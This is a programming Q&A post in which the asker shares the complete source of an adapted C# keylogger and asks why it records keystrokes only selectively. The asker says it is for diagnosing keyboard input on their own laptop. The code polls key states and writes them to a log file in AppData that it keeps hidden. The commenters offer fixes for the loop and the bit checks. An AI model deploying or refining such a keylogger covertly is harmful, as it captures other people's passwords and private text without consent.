# Why does this C# keylogger selectively save keystrokes?

Tags: c#, text, io, keylogger

I adjusted [this](https://github.com/crhenr/csharp-keylogger) keylogger (I need it for seeing whether Unity is the problem on my laptop), but it appears not to capture all keystrokes, only nonsense.

For example, upon typing "abcdefghijklmnopqrstuv",

> [1][Back][Enter][Right]adefloprsz[Shift][Ctrl]

(I adjusted it so it would not screw with my antivirus software)

*sorry for asking this here, but i really don't know how to fix it.* (i tried)

```cs
using System;
using System.IO;
using System.Net;
using System.Net.Mail;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Timers;

namespace KeyLogger
{
    class Program
    {
        private String path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Log.txt";

        [DllImport("user32.dll")]
        public static extern int GetAsyncKeyState(Int32 i);
        static void Main(string[] args)
        {
            new Program().start();
        }

        private void start()
        {
            if (File.Exists(path)) File.SetAttributes(path, FileAttributes.Hidden);

            while (true)
            {
                for (int i = 0; i < 255; i++)
                {
                    int key = GetAsyncKeyState(i);
                    if (key == 1 || key == -32767)
                    {
                        StreamWriter file = new StreamWriter(path, true);
                        File.SetAttributes(path, FileAttributes.Hidden);
                        file.Write(verifyKey(i));
                        file.Close();
                        break;
                    }
                }
            }
        }

        private String verifyKey(int code)
        {
            String key = "";

            if (code == 8) key = "[Back]";
            else if (code == 9) key = "[TAB]";
            else if (code == 13) key = "[Enter]";
            else if (code == 19) key = "[Pause]";
            else if (code == 20) key = "[Caps Lock]";
            else if (code == 27) key = "[Esc]";
            else if (code == 32) key = "[Space]";
            else if (code == 33) key = "[Page Up]";
            else if (code == 34) key = "[Page Down]";
            else if (code == 35) key = "[End]";
            else if (code == 36) key = "[Home]";
            else if (code == 37) key = "Left]";
            else if (code == 38) key = "[Up]";
            else if (code == 39) key = "[Right]";
            else if (code == 40) key = "[Down]";
            else if (code == 44) key = "[Print Screen]";
            else if (code == 45) key = "[Insert]";
            else if (code == 46) key = "[Delete]";
            else if (code == 48) key = "0";
            else if (code == 49) key = "1";
            else if (code == 50) key = "2";
            else if (code == 51) key = "3";
            else if (code == 52) key = "4";
            else if (code == 53) key = "5";
            else if (code == 54) key = "6";
            else if (code == 55) key = "7";
            else if (code == 56) key = "8";
            else if (code == 57) key = "9";
            else if (code == 65) key = "a";
            else if (code == 66) key = "b";
            else if (code == 67) key = "c";
            else if (code == 68) key = "d";
            else if (code == 69) key = "e";
            else if (code == 70) key = "f";
            else if (code == 71) key = "g";
            else if (code == 72) key = "h";
            else if (code == 73) key = "i";
            else if (code == 74) key = "j";
            else if (code == 75) key = "k";
            else if (code == 76) key = "l";
            else if (code == 77) key = "m";
            else if (code == 78) key = "n";
            else if (code == 79) key = "o";
            else if (code == 80) key = "p";
            else if (code == 81) key = "q";
            else if (code == 82) key = "r";
            else if (code == 83) key = "s";
            else if (code == 84) key = "t";
            else if (code == 85) key = "u";
            else if (code == 86) key = "v";
            else if (code == 87) key = "w";
            else if (code == 88) key = "x";
            else if (code == 89) key = "y";
            else if (code == 90) key = "z";
            else if (code == 91) key = "[Windows]";
            else if (code == 92) key = "[Windows]";
            else if (code == 93) key = "[List]";
            else if (code == 96) key = "0";
            else if (code == 97) key = "1";
            else if (code == 98) key = "2";
            else if (code == 99) key = "3";
            else if (code == 100) key = "4";
            else if (code == 101) key = "5";
            else if (code == 102) key = "6";
            else if (code == 103) key = "7";
            else if (code == 104) key = "8";
            else if (code == 105) key = "9";
            else if (code == 106) key = "*";
            else if (code == 107) key = "+";
            else if (code == 109) key = "-";
            else if (code == 110) key = ",";
            else if (code == 111) key = "/";
            else if (code == 112) key = "[F1]";
            else if (code == 113) key = "[F2]";
            else if (code == 114) key = "[F3]";
            else if (code == 115) key = "[F4]";
            else if (code == 116) key = "[F5]";
            else if (code == 117) key = "[F6]";
            else if (code == 118) key = "[F7]";
            else if (code == 119) key = "[F8]";
            else if (code == 120) key = "[F9]";
            else if (code == 121) key = "[F10]";
            else if (code == 122) key = "[F11]";
            else if (code == 123) key = "[F12]";
            else if (code == 144) key = "[Num Lock]";
            else if (code == 145) key = "[Scroll Lock]";
            else if (code == 160) key = "[Shift]";
            else if (code == 161) key = "[Shift]";
            else if (code == 162) key = "[Ctrl]";
            else if (code == 163) key = "[Ctrl]";
            else if (code == 164) key = "[Alt]";
            else if (code == 165) key = "[Alt]";
            else if (code == 187) key = "=";
            else if (code == 186) key = "ç";
            else if (code == 188) key = ",";
            else if (code == 189) key = "-";
            else if (code == 190) key = ".";
            else if (code == 192) key = "'";
            else if (code == 191) key = ";";
            else if (code == 193) key = "/";
            else if (code == 194) key = ".";
            else if (code == 219) key = "´";
            else if (code == 220) key = "]";
            else if (code == 221) key = "[";
            else if (code == 222) key = "~";
            else if (code == 226) key = "\\";
            else key = "[" + code + "]";

            return key;
        }

        
    }
}
```

Thank you for helping me

Comment: Wooow.. Tight looping like that, that opens and closes a file thousands of times a second while a key is pressed? I'm amazed it works at all

Comment: Please read the documentation of GetAsyncState: it states if the MSB (bit 15) is set than the key is down, if the LSB (bit 0) is set the key was down since the last query. 1 is not the only case where the LSB is set, and -32767 is not the only case where the MSB is set. Properly check for the bits, e.g. `((key & 1) != 0) || ((key & (1 << 15)) != 0)`. Also `new Program().start()` is nonsensical. Just declare your Program class as static and directly call start.